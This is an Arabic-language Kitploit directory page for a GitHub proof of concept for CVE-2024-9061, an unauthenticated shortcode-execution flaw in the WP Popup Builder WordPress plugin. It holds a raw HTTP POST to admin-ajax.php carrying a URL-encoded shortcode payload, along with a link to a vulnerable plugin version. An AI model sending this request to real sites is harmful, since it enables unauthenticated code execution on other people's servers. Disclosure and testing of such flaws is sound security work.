Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-9061 — WP Popup Builder – نماذج البوب أب وتوليد العملاء المحتملين للتسويق <= 1.3.5 - تنفيذ شورت كود عشوائي بدون مصادقة عبر wp_ajax_nopriv_shortcode_Api_Add | Kitploit
أدوات/GitHubGitHub/randomrobbiebf/cve-2024-9061
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubrandomrobbiebf/cve-2024-9061

CVE-2024-9061

WP Popup Builder – نماذج البوب أب وتوليد العملاء المحتملين للتسويق <= 1.3.5 - تنفيذ شورت كود عشوائي بدون مصادقة عبر wp_ajax_nopriv_shortcode_Api_Add

عرض المستودع
3منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-9061

WP Popup Builder – Popup Forms and Marketing Lead Generation <= 1.3.5 - تنفيذ Shortcode تعسفي بدون مصادقة عبر wp_ajax_nopriv_shortcode_Api_Add

الوصف

تعد إضافة WP Popup Builder – Popup Forms and Marketing Lead Generation لمنصة ووردبريس عرضة لتنفيذ shortcode تعسفي عبر إجراء AJAX wp_ajax_nopriv_shortcode_Api_Add في جميع الإصدارات حتى 1.3.5 ضمنًا. يعود السبب إلى أن البرنامج يسمح للمستخدمين بتنفيذ إجراء لا يتحقق من قيمة ما بشكل صحيح قبل تشغيل do_shortcode، مما يتيح للمهاجمين غير المصادق عليهم تنفيذ shortcodes تعسفية. ملاحظة: تم إصلاح هذه الثغرة جزئيًا في الإصدار 1.3.5 عبر فحص nonce، وهو ما منع الوصول إلى الدالة المتأثرة بشكل فعّال. غير أن الإصدار 1.3.6 يتضمن فحص التفويض الصحيح لمنع الوصول غير المصرح به.

كان لدي إضافة أخرى مثبتة لتنفيذ PHP لهذا الغرض، لكنني لم أتمكن أبدًا من جعلها تنفذ.

[xyz-ips snippet="test"]

معلومات

root@kitploit:~
Type: plugin
CVSS Score: 7.3
CVE: CVE-2024-9061
Slug: wp-popup-builder
Download Link: Download [wp-popup-builder Version 1.3.2](https://downloads.wordpress.org/plugin/wp-popup-builder.1.3.2.zip)

إثبات المفهوم (POC)

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wpscan-vulnerability-test-bench.ddev.site
User-Agent: curl/8.7.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
Connection: keep-alive

action=shortcode_Api_Add&shortcode=%5b%78%79%7a%2d%69%70%73%20%73%6e%69%70%70%65%74%3d%22%74%65%73%74%22%5d

الاستجابة عبارة عن 200 فارغة.

تنزيل الأداة